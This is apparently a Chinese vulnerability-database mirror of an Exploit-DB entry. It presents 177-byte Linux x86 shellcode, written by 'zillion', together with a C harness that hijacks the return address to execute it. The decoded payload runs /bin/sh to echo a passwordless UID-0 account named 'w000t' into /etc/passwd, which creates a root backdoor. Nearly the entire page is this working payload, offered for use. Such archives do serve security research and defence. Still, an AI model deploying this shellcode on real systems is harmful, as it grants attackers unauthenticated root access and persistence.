Linux/x86 - Add Root User (w000t) + No Password Shellcode (177 bytes)

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1057121 漏洞类型
发布时间 2009-01-01 更新时间 2009-01-01
CVE编号 N/A CNNVD-ID N/A
漏洞平台 Linux_x86 CVSS评分 N/A
|漏洞来源
https://www.exploit-db.com/exploits/43662
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
Linux x86 shellcode that uses execve and echo >> to create a passwordless
root account.


Author: zillion
Email : zillion@safemode.org
Homepage: safemode.org
File: w000t-shell.c



/*
 * This shellcode will add a passwordless local root account 'w000t'
 * Written by zillion@safemode.org
 *
 * Why so big ? it uses execve ;-)
 */

char shellcode[]=
        "\xeb\x2a\x5e\x31\xc0\x88\x46\x07\x88\x46\x0a\x88\x46\x47\x89"
        "\x76\x49\x8d\x5e\x08\x89\x5e\x4d\x8d\x5e\x0b\x89\x5e\x51\x89"
        "\x46\x55\xb0\x0b\x89\xf3\x8d\x4e\x49\x8d\x56\x55\xcd\x80\xe8"
        "\xd1\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68\x23\x2d\x63\x23"
        "\x2f\x62\x69\x6e\x2f\x65\x63\x68\x6f\x20\x77\x30\x30\x30\x74"
        "\x3a\x3a\x30\x3a\x30\x3a\x73\x34\x66\x65\x6d\x30\x64\x65\x3a"
        "\x2f\x72\x6f\x6f\x74\x3a\x2f\x62\x69\x6e\x2f\x62\x61\x73\x68"
        "\x20\x3e\x3e\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64"
        "\x23\x41\x41\x41\x41\x42\x42\x42\x42\x43\x43\x43\x43\x44\x44"
        "\x44\x44";



int main()
{

  int *ret;
  ret = (int *)&ret + 2;
  (*ret) = (int)shellcode;
}